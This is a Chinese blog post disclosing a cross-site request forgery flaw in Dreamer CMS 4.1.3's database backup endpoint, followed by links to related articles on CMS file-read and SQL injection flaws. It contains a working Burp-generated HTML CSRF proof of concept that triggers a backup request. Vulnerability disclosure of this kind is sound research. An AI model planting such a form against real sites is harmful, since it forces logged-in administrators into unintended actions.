梦想家内容管理系统(Dreamer CMS)跨站请求伪造漏洞

最新推荐文章于 2024-09-26 08:30:49 发布
最新推荐文章于 2024-09-26 08:30:49 发布
阅读量751 收藏 9
点赞数 10
文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36759934/article/details/135434746
版权

梦想家内容管理系统(Dreamer CMS)跨站请求伪造漏洞

目标:GitHub - iteachyou-wjn/dreamer_cms: Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正实现“0”代码建网站。

版本:4.1.3

通过组件/admin/database/backup发现包含跨站点请求伪造(CSRF)

1.png

创建poc

2.png

<html>  <!-- CSRF PoC - generated by Burp Suite Professional -->  <body>  <script>history.pushState('', '', '/')</script>    <form action="http://192.168.247.186:8888/admin/database/backup">      <input type="hidden" name="tableName" value="system&#95;adverts" />      <input type="submit" value="Submit request" />    </form>  </body> </html>

成功

3.png

本文链接:  https://www.黑客.wang/wen/22.html
飞扬的浩
关注
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,会HTML就能建站,
03-08
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正...
Dreamer CMS部署手册增加docker部署.docx
05-18
基于开源框架dreamer-cms 的linux服务器部署方案
DreamerCMS梦想家CMS内容管理系统)史上最精简的CMS系统
05-08
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正实现“0”代码建网站。
梦想cms-v1.4-后台存在任意文件读取漏洞
慢就是快
03-29 1604
我的第一个CNVD编号:CNVD-2020-10212 实验环境:win7 专业版 梦想cms v1.4 phpstudy 漏洞位置: template\admin\Template\temedit.html目录下的模版编辑功能 发现该地方直接将路径和文件名进行了拼接,其中代码关键在于变量$dir的获取 搜索editfile函数 发现$dir直接通过GET方式进行获取,没有进行过滤,且直接拼接进文件内容请求链接。 漏洞链接为: xxx.com/admin.php?m=Template&a=ed
Dreamer CMS 开源项目教程
最新发布
gitblog_00956的博客
09-26 537
Dreamer CMS 开源项目教程 项目地址:https://gitcode.com/gh_mirrors/dr/dreamer_cms 1. 项目的目录结构及介绍 Dreamer CMS 的目录结构如下: dreamer_cms ├── app │ ├── controllers │ ├── models │ ├── views │ └── ... ├── config │ ...
梦想CMS注入漏洞分析&发现小彩蛋
weixin_42508548的博客
11-24 2948
查资料的时候,偶然间看到这样一个漏洞,在一个提交表单的地方,插入SQL语句,便可以进行报错注入。看着有点像二次注入,对于这样类型的注入,我个人遇到的还是比较少的,再加上一般这种地方多数会尝试XSS,所以进行了分析,看看漏洞到底是如何产生的。 0x02 环境搭建 1、首先准备phpstudy,这里使用的是2016版本的,php版本为5.6.27 2、下载cms源码 cms下载地址:http://www.lmxcms.com/file/d/down/xitong/20210
探索未来的内容管理系统:Dreamer CMS
gitblog_00081的博客
04-05 426
探索未来的内容管理系统:Dreamer CMS dreamer_cmsDreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正实现“0”代码建网站。项目地址:https://gitcode.com/gh_mirrors/dr/d...
CNVD-1day代码审计&梦想CMS1.4&updatexml报错注入
m0_63917373的博客
01-04 1193
sql报错注入 updatexml函数利用 梦想CMS 代码审计
梦想家CMS内容管理系统
08-07
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正...
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站 不需要专业的后台开发技能
06-08
Dreamer CMS 梦想家内容发布系统采用流行的SpringBoot搭建,支持静态化、标签化建站。不需要专业的后台开发技能,会HTML就能建站,上手超简单;只需使用系统提供的标签就能轻松建设网站。全面支持各类表单字段,真正...
梦想家CMS内容管理系统(毕业设计)
qq_43509990的博客
02-18 1017
技术框架: 核心框架:Spring Boot 2 安全框架:Apache Shiro 1.6 视图框架:Spring MVC 4 工具包:Hutool 5.3.7 持久层框架:MyBatis 3 日志管理:Logback 模版框架:Thymeleaf JS框架:jQuery,Bootstrap CSS框架:Bootstrap 富文本:Ueditor、editor.md Lombok 系统结构: 开发者环境: 建议开发者使用以下环境,这样避免版本带来的问题 IDE:Spr.
梦想cms(lmxcms)v1.4 网站系统.zip
07-06
lmxcms1.4更新内容包括: 增加功能: 增加采集功能,采集功能非常强大,绝对可比拟市面上的任何cms的采集功能 增加上传图片生成缩略图可以根据宽度自动缩放高度比例 增加tags可以绑定栏目 增加随机信息调用标签 randdata 使用方法看手册 增加随机调用tags标签 randtags 使用方法看手册 后台去除嵌入广告 修复功能: 数据库恢复(注意:请在升级完成后重新备份数据库,避免以前备份过的无法恢复) 搜索时间间隔参数无效的bug 修复执行sql语句由于表前缀导致的错误 相关链接标签链接有误的bug lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。 lmxcms1.4主要包括以下功能: 自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。 自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。 站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。 友情链接:支持文字和图片形式的友情链接。 广告系统:后台支持文字、图片、html三种形式的广告系统。 在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。 焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。 数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。 模板管理:后台支持自定义切换模板风格,支持在线编辑模板(需要修改配置文件)。 文件管理:系统内嵌了swfupload上传插件,可以在文件管理里面来管理后台上传的各种图片、文件、附件等。 扩展变量:支持自定义扩展变量,可以在模板任意处输出该变量内容。 日志操作:后台的每一个操作都会记录到日志操作中,有需要时查看。 Tags功能:支持tags标签功能,增加信息可以选择或者自动创建,每个tags标签也可以定义不同的模板。 采集系统:支持图片远程保存,图片的各种处理等。 专题功能:支持自定义创建专题功能,增加信息可以选择专题,每个专题可以定义不同模板等。 自动、手动分词:增加、修改信息时,可以选择自动把正文或者标题提取为关键字功能。 提取描述:增加信息时可以选择自动提取正文中的第一段为描述信息。        相关阅读 同类推荐:lmxcms后台密码找回插件 企业网站源码
dreamer-cms docker复现
这周末在做梦的博客
06-09 1069
dreamer-cms jar包docker复现
Dreamer-cms基于springboot + thymeleaf的开发学习笔记
liudaka的博客
08-11 622
1.基本项目介绍: 2.thymeleaf结合典型场景使用的方法举例: 3.常见问题和解决方法 update_time 报错时间格式不对:00-00-00:00:00000等 SysLogger类下面简单修改如下,赋予时间初始值! @Column(name = "update_time") // 修改,解决日期的格式不对的问题! private Date updateTime = new Date(); 4.部署js类的代码 主要是起到表白的作用的js代码,已经有了js.
dreamer-cms基础教学视频整理
coca_cora_的博客
07-05 578
教学视频整理 资源目录和代码之间的关系 后台 前台 集中管理数据 展示数据 - cms |-application.yml 资源目录 - cms_web reourse directory usage htmls 生成的静态html文件 templates templates/default -> 默认模板 uploads 上传文件(e.g. 图片) config.json 百度富文本编辑器的配置,不建议修改 开发新模板: 在default同级新建
梦想cms1.4代码审计
m0_60716947的博客
01-07 1991
php代码审计,梦想cms
学习梦想家CMS内容管理系统-模板的使用
learn_8的专栏
10-14 680
网上可以自己百度搜索,我使用的这个工具就是HTTrack Website Copier,通过这个工具完成一个网站的获取,主要是获取静态文件。这种就是去官网把它的图片在页面是保存下来放到我们的项目中,大可不必这么做,知道就可以了,我们记下来去更改它的菜单部分。我们要阅读这个代码,发现是一个li的标签,找梦想家CMS给提供的标签,运用到这个地方。我们把路径改为我们自己的路径,下面资源位置的路径都可以改,就不一一截图了。上面菜单的部分应该和我们的后台是一致的,我们后台是叫下面的这个名字。
Dreamer CMS:无需编码的简易建站神器
资源摘要信息:"梦想家CMS内容管理系统" 知识点1:CMS内容管理系统概述 CMS内容管理系统)是一种基于Web的应用程序,用于管理网站内容的创作、管理和发布。它允许用户在不需要深入理解网页开发技术的情况下,创建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

飞扬的浩

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值